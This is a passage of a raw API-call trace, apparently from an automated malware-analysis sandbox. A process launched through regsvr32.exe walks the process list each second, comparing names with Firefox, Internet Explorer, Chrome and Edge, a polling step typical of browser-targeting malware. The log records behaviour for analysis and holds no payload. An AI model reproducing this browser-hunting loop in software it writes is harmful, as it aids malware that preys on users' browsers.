[0170.332] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.333] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0170.333] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0170.333] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0170.333] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0170.333] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.333] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0170.334] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0170.334] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0170.334] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0170.334] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0170.334] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0170.334] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0170.334] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0170.334] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0170.335] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0170.335] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0170.335] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0170.335] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0170.335] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0170.335] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0170.335] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0170.335] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0170.336] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0170.336] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0170.336] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0170.336] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.336] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0170.337] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0170.337] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0170.337] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0170.337] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.337] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0170.337] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0170.337] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0170.337] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0170.337] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.337] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0170.338] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0170.338] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0170.338] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0170.338] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0170.338] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0170.338] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0170.338] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0170.338] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.339] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0170.339] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0170.339] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0170.339] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0170.339] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.339] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0170.340] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0170.340] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0170.340] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0170.340] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0170.340] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0170.340] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0170.340] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0170.340] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0170.341] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0170.341] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0170.341] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0170.341] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.341] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0170.341] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0170.341] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0170.341] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0170.341] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.341] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0170.342] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0170.342] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0170.342] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0170.342] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.342] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0170.343] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0170.343] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0170.343] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0170.343] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.343] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.343] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0170.343] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0170.343] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0170.343] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.343] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.344] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.344] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.344] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.344] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.344] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0170.344] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0170.344] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0170.344] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0170.344] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.344] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.345] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.345] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.345] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.345] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0170.345] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0170.345] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0170.346] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0170.346] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.346] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.346] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.346] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.346] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.347] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.347] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.347] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.347] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.347] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0170.347] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0170.347] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0170.347] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0170.347] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.347] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.348] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0170.348] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0170.348] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0170.348] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.348] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.348] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.348] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.348] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.348] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.349] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.349] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.349] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.349] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.350] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0170.351] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0170.351] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0170.351] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0170.351] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.351] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0170.351] CloseHandle (hObject=0xd4) returned 1 [0170.352] Sleep (dwMilliseconds=0x3e8) [0171.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0171.404] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.404] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0171.404] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0171.404] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0171.404] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0171.404] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0171.405] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0171.405] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0171.405] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0171.405] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0171.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0171.405] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0171.405] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0171.405] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0171.405] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.406] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0171.406] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0171.406] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0171.406] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.406] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0171.406] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0171.406] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0171.407] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0171.407] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.407] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.407] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0171.407] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0171.407] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0171.407] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.407] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0171.408] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0171.408] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0171.408] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0171.408] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.408] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0171.408] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0171.408] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0171.408] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0171.408] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.408] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0171.409] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0171.409] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0171.409] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0171.409] lstrcmpiA 